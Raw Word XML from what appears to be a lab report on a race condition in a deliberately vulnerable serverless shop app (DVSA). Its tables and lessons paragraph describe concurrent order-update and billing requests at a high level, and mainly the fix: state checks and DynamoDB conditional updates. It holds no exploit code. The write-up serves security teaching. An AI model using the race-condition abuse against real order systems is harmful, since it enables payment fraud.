        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table A</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9237" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84B64" w14:paraId="25064DEE" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="902"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA0003F" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00051D50">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3643E7" w14:textId="718552C6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7FF02" w14:textId="55C3DDC6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCE5EBA" w14:textId="1DB1B243" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t xml:space="preserve">Normal Behavior Evi </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D84B64">
              <w:t>dence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4714E1BB" w14:textId="423E2FBC" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00D84B64">
              <w:t xml:space="preserve">xploit Behavior Evi </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D84B64">
              <w:t>dence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84B64" w14:paraId="3618346C" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE856EF" w14:textId="34E1BC74" w:rsidR="00D84B64" w:rsidRDefault="00D8465A" w:rsidP="00D8465A">
            <w:r w:rsidRPr="00D8465A">
              <w:t>Logic Vulnerability / Race Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555C06DC" w14:textId="09BD721F" w:rsidR="00D84B64" w:rsidRDefault="00D8465A" w:rsidP="00D8465A">
            <w:r w:rsidRPr="00D8465A">
              <w:t>An order should move through a controlled sequence. Update is only allowed while the order is open. Billing should finalize payment once and prevent conflicting concurrent transitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FFF76" w14:textId="34291BA7" w:rsidR="00D84B64" w:rsidRDefault="00D8465A" w:rsidP="00D8465A">
            <w:r w:rsidRPr="00D8465A">
              <w:t>API requests, terminal output, Lambda workflow, DynamoDB-backed order state, CloudWatch logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37782E08" w14:textId="77D98032" w:rsidR="00D84B64" w:rsidRDefault="00F9450F" w:rsidP="00F9450F">
            <w:r w:rsidRPr="00F9450F">
              <w:t>new returned order created, update returned cart updated, billing returned success with amount/token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188AAC6B" w14:textId="1DC3F691" w:rsidR="00D84B64" w:rsidRDefault="00F9450F" w:rsidP="00F9450F">
            <w:r w:rsidRPr="00F9450F">
              <w:t>Concurrent requests produced timing-sensitive state responses such as order already paid and order already made, showing weak sequencing before fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42E75DEB" w14:textId="7EA8F64B" w:rsidR="000824B5" w:rsidRDefault="000824B5" w:rsidP="005812C2"/>
    <w:p w14:paraId="7B6F7A04" w14:textId="7812B437" w:rsidR="00D8465A" w:rsidRDefault="000824B5" w:rsidP="00EB2221">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010B3A8" w14:textId="007839E6" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table B:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9252" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1503"/>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="1494"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1498"/>
        <w:gridCol w:w="1710"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A6D07" w14:paraId="76CA67A6" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F402AC4" w14:textId="2B6A2B3C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="00BA72A1">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB58ADA" w14:textId="59267A70" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9CAB62" w14:textId="19D58B0C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128DC4CD" w14:textId="77777777" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Fix</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B678E84" w14:textId="63C3B740" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r>
              <w:t>(where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED33578" w14:textId="70139375" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B71C6D" w14:textId="0FD3B43A" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t xml:space="preserve">Optional Latency </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A6D07">
              <w:t>Be fore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A6D07">
              <w:t xml:space="preserve"> / After Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A6D07" w14:paraId="346904DB" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF73447" w14:textId="650D6562" w:rsidR="007A6D07" w:rsidRDefault="00D8465A" w:rsidP="00D8465A">
            <w:r w:rsidRPr="00D8465A">
              <w:t>Logic Vulnerability / Race Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D7411" w14:textId="2913B564" w:rsidR="007A6D07" w:rsidRDefault="00D8465A" w:rsidP="00D8465A">
            <w:r w:rsidRPr="00D8465A">
              <w:t>The backend allowed competing workflow operations to interact with the same order before strict state enforcement occurred. The system reacted after state progression instead of preventing invalid transitions at the start.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767A75B5" w14:textId="78C9AFA9" w:rsidR="007A6D07" w:rsidRDefault="008943CC" w:rsidP="008943CC">
            <w:r w:rsidRPr="008943CC">
              <w:t>Intentional misuse / security-relevant abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5302902C" w14:textId="1ED88484" w:rsidR="007A6D07" w:rsidRDefault="008943CC" w:rsidP="008943CC">
            <w:r w:rsidRPr="008943CC">
              <w:t xml:space="preserve">Added strict </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008943CC">
              <w:t>orderStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008943CC">
              <w:t xml:space="preserve"> == 100 checks and DynamoDB conditional updates in DVSA-ORDER-UPDATE and DVSA-ORDER-BILLING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2461C5B9" w14:textId="4A91A54B" w:rsidR="007A6D07" w:rsidRDefault="008943CC" w:rsidP="008943CC">
            <w:r w:rsidRPr="008943CC">
              <w:t>Re-running the race produced invalid state transition, showing the server now rejects conflicting requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55EB0699" w14:textId="3DAA95EA" w:rsidR="007A6D07" w:rsidRDefault="008943CC" w:rsidP="008943CC">
            <w:r w:rsidRPr="008943CC">
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70E163AC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="19F2D1DB" w14:textId="7EA07071" w:rsidR="00956299" w:rsidRDefault="00956299" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00956299">
        <w:t>Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F52F1" w14:textId="57CADF13" w:rsidR="00B20F40" w:rsidRPr="00B20F40" w:rsidRDefault="00823ED8" w:rsidP="00823ED8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00823ED8">
        <w:t>This lesson shows that security is not only about authentication and input validation. In serverless systems, workflow integrity is equally important. If state transitions are not enforced atomically on the server side, concurrent requests can interfere with business logic and produce security-relevant misuse. The correct design principle is to validate state transitions strictly and use conditional updates so that only one valid workflow path can succeed at a time.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B20F40" w:rsidRPr="00B20F40" w:rsidSect="000A57D4">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60BA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31C81FAE"/>
    <w:lvl w:ilvl="0" w:tplc="2F202BBC">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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E31B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43ADE72"/>
    <w:lvl w:ilvl="0" w:tplc="B5BA2292">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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4B170F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B82E242"/>
    <w:lvl w:ilvl="0" w:tplc="38822450">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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4511C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0234FC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9444F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F589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514000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430C1D0"/>
    <w:lvl w:ilvl="0" w:tplc="241E097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8285038"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34367130"/>
    <w:lvl w:ilvl="0" w:tplc="DAF47334">
      <w:start w:val="9"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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69C23F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FC661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74732C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60200B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281645B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8A40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3A82255"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD5E45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8033359"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E263E4C"/>
    <w:lvl w:ilvl="0" w:tplc="397CA8E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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F5215D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DE293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AC544DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6DA46"/>
    <w:lvl w:ilvl="0" w:tplc="E5CA34DA">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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D2A463F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAFE5424"/>
    <w:lvl w:ilvl="0" w:tplc="4ED47D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="4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1AB7353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE86CD8"/>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9213267"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6F61438"/>
    <w:lvl w:ilvl="0" w:tplc="5386C422">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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97E3772"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACA82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947D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A58EC3F0"/>
    <w:lvl w:ilvl="0" w:tplc="83248F16">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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DEE67A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="165889A8"/>
    <w:lvl w:ilvl="0" w:tplc="C86E9D9C">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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68102762">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379283219">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="462114230">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1307512281">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="475538599">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="780494637">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1139763358">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="149761307">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1891768054">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="553077378">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="314800575">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="314725528">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="896622703">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="652836293">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1834027199">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1577084586">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="389808910">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1024017928">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2064057787">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="18896112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B04"/>
    <w:rsid w:val="00067CFD"/>
    <w:rsid w:val="000824B5"/>
    <w:rsid w:val="0009190F"/>
    <w:rsid w:val="000A57D4"/>
    <w:rsid w:val="000E3FC4"/>
    <w:rsid w:val="00142AD2"/>
    <w:rsid w:val="00146B65"/>
    <w:rsid w:val="001B1985"/>
    <w:rsid w:val="001F662A"/>
    <w:rsid w:val="00292A6C"/>
    <w:rsid w:val="002C79D1"/>
    <w:rsid w:val="00370E8C"/>
    <w:rsid w:val="00383415"/>
    <w:rsid w:val="003E1073"/>
    <w:rsid w:val="0043049B"/>
    <w:rsid w:val="00472D4A"/>
    <w:rsid w:val="004754AE"/>
    <w:rsid w:val="004A4DDC"/>
    <w:rsid w:val="00512056"/>
    <w:rsid w:val="00547D7A"/>
    <w:rsid w:val="005812C2"/>
    <w:rsid w:val="0058607E"/>
    <w:rsid w:val="00593E1A"/>
    <w:rsid w:val="005C76E2"/>
    <w:rsid w:val="005E1E77"/>
    <w:rsid w:val="005F2D61"/>
    <w:rsid w:val="00645E7F"/>
    <w:rsid w:val="006A5EBA"/>
    <w:rsid w:val="006F431D"/>
    <w:rsid w:val="00707166"/>
    <w:rsid w:val="007320F2"/>
    <w:rsid w:val="007A6D07"/>
    <w:rsid w:val="007F1665"/>
    <w:rsid w:val="00823ED8"/>
    <w:rsid w:val="00891046"/>
    <w:rsid w:val="008943CC"/>
    <w:rsid w:val="008D3221"/>
    <w:rsid w:val="008E0642"/>
    <w:rsid w:val="008E7FAA"/>
    <w:rsid w:val="00916481"/>
    <w:rsid w:val="009425DA"/>
    <w:rsid w:val="00956299"/>
    <w:rsid w:val="00971A1B"/>
    <w:rsid w:val="009A083D"/>
    <w:rsid w:val="009B41FC"/>
    <w:rsid w:val="00A252EB"/>
    <w:rsid w:val="00A55ACA"/>
    <w:rsid w:val="00AE7E54"/>
    <w:rsid w:val="00B1219F"/>
    <w:rsid w:val="00B20F40"/>
    <w:rsid w:val="00B248D9"/>
    <w:rsid w:val="00B63DE6"/>
    <w:rsid w:val="00BA72A1"/>
    <w:rsid w:val="00C06B04"/>
    <w:rsid w:val="00C2363F"/>
    <w:rsid w:val="00C25B37"/>
    <w:rsid w:val="00C50625"/>
    <w:rsid w:val="00C6482E"/>
    <w:rsid w:val="00C70F85"/>
    <w:rsid w:val="00CA2842"/>
    <w:rsid w:val="00CB0A80"/>
    <w:rsid w:val="00CF2583"/>
    <w:rsid w:val="00CF3286"/>
    <w:rsid w:val="00D00A7D"/>
    <w:rsid w:val="00D8465A"/>
    <w:rsid w:val="00D84B64"/>
    <w:rsid w:val="00D90B21"/>
    <w:rsid w:val="00E025EC"/>
    <w:rsid w:val="00E10DDC"/>
    <w:rsid w:val="00E463E4"/>
    <w:rsid w:val="00E73233"/>
    <w:rsid w:val="00E80AF1"/>
    <w:rsid w:val="00EA519A"/>
    <w:rsid w:val="00EB2221"/>
    <w:rsid w:val="00EC326A"/>
    <w:rsid w:val="00F24FB8"/>
    <w:rsid w:val="00F57F67"/>
    <w:rsid w:val="00F9450F"/>
    <w:rsid w:val="00FC2750"/>
    <w:rsid w:val="00FD6CA5"/>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508070"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBD19FAC-6F11-419D-8EFE-DB2F017BA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6B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06B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06B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6B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6B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6B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B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B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B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B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06B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06B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6B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6B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6B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B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B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B04"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B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B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B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B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B04"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B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6B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
